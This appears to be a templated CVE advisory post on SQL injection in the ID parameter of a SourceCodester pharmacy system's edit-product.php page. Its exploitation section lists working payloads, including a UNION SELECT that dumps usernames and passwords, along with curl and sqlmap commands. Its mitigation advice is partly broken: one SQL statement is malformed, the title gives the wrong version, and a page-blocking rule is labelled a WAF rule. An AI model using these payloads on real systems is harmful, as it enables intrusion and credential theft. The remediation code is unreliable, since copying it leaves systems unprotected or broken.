SourceCodester Web-based Pharmacy Product Management System 10, SQL Injection, CVE-2025-3697 (Critical)

Listen to this Post

How the CVE Works:

CVE-2025-3697 is a critical SQL injection vulnerability in SourceCodester’s Web-based Pharmacy Product Management System 1.0. The flaw exists in the `/edit-product.php` file, where the `ID` parameter is improperly sanitized before being used in SQL queries. Attackers can manipulate this parameter to inject malicious SQL commands, potentially leading to unauthorized database access, data theft, or system compromise. The vulnerability is remotely exploitable, requiring low-privilege access, and has a public exploit, increasing its risk.

DailyCVE Form:

Platform: SourceCodester Pharmacy Management
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation:

1. Craft malicious payload:

' OR 1=1--

2. Exploit via curl:

curl -X GET "http://target.com/edit-product.php?ID=1'%20OR%201=1--"

3. Dump database:

' UNION SELECT username,password FROM users--

Mitigation:

1. Patch: Apply vendor updates.

2. Input sanitization:

$id = mysqli_real_escape_string($conn, $_GET['ID']);

3. WAF rules:

location ~ edit-product.php {
deny all;
}

4. Database hardening:

REVOKE ALL PRIVILEGES ON . FROM 'app_user'@'%';

Detection:

1. Log monitoring:

grep "edit-product.php?ID=" /var/log/apache2/access.log

2. SQLi scanners:

sqlmap -u "http://target.com/edit-product.php?ID=1" --risk=3

References:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top